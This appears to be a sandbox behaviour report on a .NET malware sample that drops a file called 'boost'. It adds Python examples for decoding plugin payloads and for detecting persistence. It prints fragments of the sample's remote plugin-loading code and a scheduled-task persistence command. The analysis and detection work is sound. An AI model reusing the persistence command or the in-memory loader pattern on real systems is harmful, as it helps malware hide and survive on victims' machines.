            Source: C:\Windows\System32\OpenWith.exe | Sections loaded (49, in order): kernel.appcore.dll, uxtheme.dll, onecoreuapcommonproxystub.dll, windows.storage.dll, wldp.dll, twinui.dll, wintypes.dll, powrprof.dll, dwmapi.dll, pdh.dll, umpdc.dll, onecorecommonproxystub.dll, actxprxy.dll, propsys.dll, profapi.dll, windows.staterepositoryps.dll, windows.ui.appdefaults.dll, windows.ui.immersive.dll, ntmarta.dll, uiautomationcore.dll, dui70.dll, duser.dll, dwrite.dll, bcp47mrm.dll, uianimation.dll, d3d11.dll, dxgi.dll, d3d10warp.dll, resourcepolicyclient.dll, dxcore.dll, dcomp.dll, oleacc.dll, edputil.dll, windows.ui.dll, windowmanagementapi.dll, textinputframework.dll, inputhost.dll, coreuicomponents.dll, coremessaging.dll, coremessaging.dll, coreuicomponents.dll, coremessaging.dll, twinapi.appcore.dll, twinapi.appcore.dll, windowscodecs.dll, thumbcache.dll, sxs.dll, directmanipulation.dll, textshaping.dll
            Source: C:\Users\user\AppData\Roaming\boost | Sections loaded (11, in order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: boost.lnk.0.dr | LNK file: ..\..\..\..\..\boost
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: aZDwfEKorn.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: aZDwfEKorn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: aZDwfEKorn.exe, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: aZDwfEKorn.exe, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: aZDwfEKorn.exe, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: boost.0.dr, Messages.cs | .NET code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: aZDwfEKorn.exe, Messages.cs | .NET code: Plugin System.AppDomain.Load(byte[])
            Source: aZDwfEKorn.exe, Messages.cs | .NET code: Memory System.AppDomain.Load(byte[])
            Source: aZDwfEKorn.exe, Messages.cs | .NET code: Memory
            Source: boost.0.dr, Messages.cs | .NET code: Plugin System.AppDomain.Load(byte[])
            Source: boost.0.dr, Messages.cs | .NET code: Memory System.AppDomain.Load(byte[])
            Source: boost.0.dr, Messages.cs | .NET code: Memory
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC45D2A5 pushad ; iretd 7_2_00007FFAAC45D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC5700BD pushad ; iretd 7_2_00007FFAAC5700C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFAAC642316 push 8B485F95h; iretd 7_2_00007FFAAC64231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFAAC48D2A5 pushad ; iretd 11_2_00007FFAAC48D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FFAAC672316 push 8B485F92h; iretd 11_2_00007FFAAC67231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC49D2A5 pushad ; iretd 14_2_00007FFAAC49D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC5B0523 pushad ; retf 14_2_00007FFAAC5B05ED
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC5B0625 pushad ; retf 14_2_00007FFAAC5B05ED
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_00007FFAAC682316 push 8B485F91h; iretd 14_2_00007FFAAC68231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC47D2A5 pushad ; iretd 16_2_00007FFAAC47D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC592AA8 push E95E0372h; ret 16_2_00007FFAAC592AC9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 16_2_00007FFAAC662316 push 8B485F93h; iretd 16_2_00007FFAAC66231B
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File created: C:\Users\user\AppData\Roaming\boost (dropped file; 2 events)
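The LateCall rows above show the sample splitting a received message into fields (Pack) and handing two of them to a dynamically loaded plugin: Pack[2] is passed through as-is, while Pack[3] is base64-decoded and decompressed, and the Plugin/Memory paths turn such a blob into an assembly with System.AppDomain.Load(byte[]). The Python below is an added example, not code from the sample or from the Joe Sandbox report, that reproduces that unpacking step on a constructed message and checks whether the recovered bytes are a PE carrying a CLR header (the IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR directory noted in the static PE information above), which is what AppDomain.Load needs. Assumptions: the value of the Settings.SPL separator and the fact that Helper.Decompress is a GZip inflate are not shown on this page; the first two message fields and the fake PE image are constructed for the demonstration.

```python
import base64
import gzip
import struct

# Assumptions (not shown on this page): Settings.SPL is given a placeholder
# value, and Helper.Decompress is taken to be a GZip inflate.
SPL = "<SPL>"
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # slot of the CLR runtime header


def decompress_field(b64: str) -> bytes:
    """Python equivalent of Helper.Decompress(Convert.FromBase64String(Pack[3]))."""
    return gzip.decompress(base64.b64decode(b64))


def pe_info(data: bytes) -> dict:
    """Minimal PE header walk: is it a PE, PE32 or PE32+, and does it have a
    CLR header? A non-empty COM descriptor directory is what makes a blob
    loadable through System.AppDomain.Load(byte[])."""
    info = {"is_pe": False, "is_managed": False, "magic": None}
    try:
        if len(data) < 0x40 or data[:2] != b"MZ":
            return info
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return info
        info["is_pe"] = True
        opt = e_lfanew + 4 + 20                       # optional header follows the COFF header
        magic = struct.unpack_from("<H", data, opt)[0]
        info["magic"] = magic                          # 0x10B = PE32, 0x20B = PE32+
        dirs = opt + (112 if magic == 0x20B else 96)   # first data directory entry
        n_dirs = struct.unpack_from("<I", data, dirs - 4)[0]   # NumberOfRvaAndSizes
        if n_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:
            rva, size = struct.unpack_from(
                "<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
            info["is_managed"] = rva != 0 and size != 0
    except struct.error:
        pass                                           # truncated header: keep what we know
    return info


def parse_plugin_message(msg: str) -> dict:
    """Split a message on SPL and unpack the fields the sample uses:
    Pack[2] as-is, Pack[3] base64-decoded and decompressed."""
    pack = msg.split(SPL)
    if len(pack) < 4:
        raise ValueError("plugin message needs at least four fields")
    payload = decompress_field(pack[3])
    return {"plugin_id": pack[2], "payload_size": len(payload), **pe_info(payload)}


def build_fake_managed_pe() -> bytes:
    """Constructed stand-in for a plugin assembly: a well-formed PE32+ header
    with a non-empty CLR directory and no sections or code at all."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)  # x64, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                          # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                           # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    return dos + b"PE\0\0" + coff + bytes(opt)


def build_sample_message() -> str:
    """Constructed message; the first two fields are placeholders because the
    report only shows Pack[2] and Pack[3] being consumed."""
    blob = base64.b64encode(gzip.compress(build_fake_managed_pe())).decode("ascii")
    return SPL.join(["plugin", "placeholder", "ExamplePlugin", blob])


if __name__ == "__main__":
    print(parse_plugin_message(build_sample_message()))
```

On a real capture the same check tells you whether a decoded Pack[3] is an in-memory assembly worth carving (is_managed) or something else, before it is ever handed to a loader.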

            Boot Survival

            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boost" /tr "C:\Users\user\AppData\Roaming\boost"
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boost.lnk (2 events)
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boost (2 events)
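The Boot Survival rows describe three persistence mechanisms set up by one process: a scheduled task that re-launches C:\Users\user\AppData\Roaming\boost every minute at run level HIGHEST, a shortcut in the user's Startup folder, and an HKCU Run value. The Python below is an added example, not part of the Joe Sandbox report, that applies rule logic to behaviour rows of this shape and explains why each one is flagged. The rows are constructed from the report, plus one constructed benign schtasks row as a control; the rule names, the user-writable directory list and the "every 5 minutes or less" threshold are the example's own choices.

```python
import re
from typing import Iterable

# Behaviour rows constructed from this report: (source process, event kind, detail).
# The last row is a constructed benign control and is not from the report.
SAMPLE_EVENTS = [
    ("C:\\Users\\user\\Desktop\\aZDwfEKorn.exe", "Process created",
     '"C:\\Windows\\System32\\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
     '/tn "boost" /tr "C:\\Users\\user\\AppData\\Roaming\\boost"'),
    ("C:\\Users\\user\\Desktop\\aZDwfEKorn.exe", "File created",
     "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\boost.lnk"),
    ("C:\\Users\\user\\Desktop\\aZDwfEKorn.exe", "Registry value created or modified",
     "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run boost"),
    ("C:\\Windows\\System32\\svchost.exe", "Process created",
     '"C:\\Windows\\System32\\schtasks.exe" /create /tn "Backup" /sc daily /st 02:00 '
     '/tr "C:\\Program Files\\Backup\\run.exe"'),
]

# Directories an unprivileged user can write to. A task action living here is a
# weak signal on its own and a strong one combined with the other flags below.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def parse_schtasks(cmdline: str) -> dict:
    """Tokenise a schtasks command line (quoted arguments kept whole) into a
    {switch: value} map; switches that take no value map to True."""
    toks = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    args, i = {}, 1                      # toks[0] is the schtasks.exe path itself
    while i < len(toks):
        key = toks[i].lower()
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            args[key] = toks[i + 1]
            i += 2
        else:
            args[key] = True
            i += 1
    return args


def schtasks_flags(args: dict) -> list[str]:
    """Rules for a task-creation command line; returns the matched flag names."""
    flags = []
    if "/create" not in args:
        return flags
    mo = args.get("/mo", "1")
    interval = int(mo) if str(mo).isdigit() else 1
    if str(args.get("/sc", "")).lower() == "minute" and interval <= 5:
        flags.append("relaunch_every_few_minutes")     # watchdog-style re-execution
    if str(args.get("/rl", "")).upper() == "HIGHEST":
        flags.append("run_level_highest")              # elevated whenever the user is an admin
    tr = args.get("/tr", "")
    tr = tr if isinstance(tr, str) else ""
    if any(p in tr.lower() for p in USER_WRITABLE):
        flags.append("task_action_in_user_writable_dir")
    if tr and "." not in tr.rsplit("\\", 1)[-1]:
        flags.append("task_action_without_extension")  # e.g. ...\Roaming\boost
    return flags


def triage(events: Iterable[tuple[str, str, str]]) -> list[dict]:
    """Walk behaviour rows and return one finding per persistence artefact."""
    findings = []
    for proc, kind, detail in events:
        d = detail.lower()
        if kind == "Process created" and "schtasks" in d and "/create" in d:
            flags = schtasks_flags(parse_schtasks(detail))
            if flags:
                findings.append({"proc": proc, "technique": "scheduled_task",
                                 "flags": flags, "detail": detail})
        elif kind == "File created" and "\\start menu\\programs\\startup\\" in d and d.endswith(".lnk"):
            findings.append({"proc": proc, "technique": "startup_folder_lnk",
                             "flags": ["startup_shortcut"], "detail": detail})
        elif kind.startswith("Registry value") and "\\currentversion\\run" in d:
            hive = "hkcu_run_value" if d.startswith("hkey_current_user") else "hklm_run_value"
            findings.append({"proc": proc, "technique": "run_key",
                             "flags": [hive], "detail": detail})
    return findings


def persistence_score(findings: list[dict]) -> int:
    """Number of distinct (process, technique) pairs; the report's sample yields 3."""
    return len({(f["proc"], f["technique"]) for f in findings})


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["technique"], f["flags"])
    print("distinct techniques:", persistence_score(triage(SAMPLE_EVENTS)))
```

The benign daily backup task trips none of the rules, while the report's task trips all four, which is the combination (minute-level re-launch, highest run level, user-writable and extensionless action) worth alerting on rather than any single switch.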

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 events)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 events)
            Source: C:\Users\user\Desktop\aZDwfEKorn.exe | Process information set: NOOPENFILEERRORBOX (50 events)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (48 events)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
